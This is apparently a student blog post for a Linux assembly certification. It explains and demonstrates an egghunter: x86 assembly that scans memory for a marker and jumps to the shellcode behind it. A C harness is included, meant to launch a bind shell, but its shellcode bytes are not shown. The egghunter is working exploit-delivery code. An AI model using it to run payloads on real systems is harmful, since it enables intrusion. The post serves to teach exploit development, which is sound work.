IT security is a matter of trust.

SLAE Assignment 3: Egghunter Demo

This assignment is about writing a working demo of an egghunter. An egghunter is basically a small piece of code that searches memory for a code word (the egg). When the egg is found, the egghunter jumps to the address behind the egg and executes the code at this address. For further explanation, read egghunt-shellcode.pdf.

I used the second example (access revisited) for building my egghunter.

First the egghunter code:


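global _start

section .text

_start:
  xor edx,edx             ; edx = address being probed, starting at 0
doloop:
  or dx,0xfff             ; move to the last byte of the current page
nextaddr:
  inc edx                 ; next address (start of the next page after doloop)
  lea ebx,[edx+0x4]       ; ebx = address handed to the syscall for validation
  push byte +0x21
  pop eax                 ; eax = 0x21 = access(2)
  int 0x80
  cmp al,0xf2             ; 0xf2 = low byte of -EFAULT
  jz doloop               ; page is not accessible, skip it
  mov eax,0x50905090      ; the egg
  mov edi,edx
  scasd                   ; compare [edi] with the egg, edi += 4
  jnz nextaddr
  scasd                   ; the egg has to appear twice in a row
  jnz nextaddr
  jmp edi                 ; edi now points behind the egg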

And the demo code:



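#include <stdio.h>
#include <string.h>

// egghunter opcodes extracted from the assembly above (byte string not reproduced on this page)
unsigned char egghunter[] = "";

// add some data
char stuff[] = "Eat my shorts";

// bind shellcode
unsigned char shellcode[] = \
"\x90\x50\x90\x50"  //egg
"\x90\x50\x90\x50"  //egg
;  // the bind shellcode bytes from assignment 1 follow the egg (not reproduced on this page)

int main(void)
{
	printf("Shellcode Length:  %zu\n", strlen((char *)shellcode));
	printf("Egghunter Length:  %zu\n", strlen((char *)egghunter));
	int (*ret)() = (int(*)())egghunter;
	ret();
	return 0;
}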

When this is executed, the bind shell is up. For the shellcode I used the bind shellcode from assignment 1, but any shellcode can be used here. Compiling and extracting the shellcode is the same as in assignment 1 and 2, so I won’t repeat the procedure here.

Get the code.

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE-342
